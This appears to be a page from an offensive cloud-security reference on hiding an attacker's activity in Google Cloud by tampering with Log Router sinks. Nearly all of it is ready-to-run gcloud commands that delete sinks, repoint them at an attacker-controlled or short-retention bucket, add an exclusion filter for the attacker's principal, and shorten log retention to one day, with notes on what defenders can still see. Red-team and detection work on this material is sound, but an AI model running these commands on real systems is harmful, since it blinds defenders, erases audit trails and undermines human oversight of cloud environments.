The Log Router sends every log entry through sinks to their destinations (a logging bucket, Cloud Storage, BigQuery, or Pub/Sub, including an aggregated org-level sink to a SIEM). Control over the sinks, or over the exclusion filters that sit in front of them, lets you stop your activity from ever reaching where defenders read it. logging.sinks.* and logging.logEntries.* permissions are the levers.
Enumerate the routing#
gcloud logging sinks list
gcloud logging sinks describe <sink> # destination and filter
gcloud logging buckets list --location=global
Drop the destination or redirect it#
# delete a sink so its destination stops receiving entries
gcloud logging sinks delete <sink>
# or repoint it at a bucket you control, or one with 1-day retention
gcloud logging sinks update <sink> \
storage.googleapis.com/<attacker-or-short-retention-bucket>
Exclude only your activity#
Quieter than deleting a sink: add an exclusion filter so the entries you are about to generate are never routed.
# drop entries for a principal or resource at the sink
gcloud logging sinks update _Default \
--add-exclusion=name=x,filter='protoPayload.authenticationInfo.principalEmail="attacker@example.com"'
# or shorten retention on the _Default bucket so entries age out fast
gcloud logging buckets update _Default --location=global --retention-days=1
Exploitation notes#
- Sink and exclusion changes are themselves Admin Activity events, which cannot be turned off, so the tampering call is visible even when it stops later entries; it is clean only if nothing is watching the Admin Activity stream in real time.
- An aggregated org or folder sink shipping to an external SIEM is outside a project-level principal's reach, so confirm where logs land before relying on silence.
- An exclusion on
_Defaultdoes not touch a separate sink to a SIEM; enumerate every sink, not just_Default.
Tools#
- gcloud (
logging sinks,logging buckets): all of the above. - ScoutSuite / Prowler: enumerate sink and retention configuration first.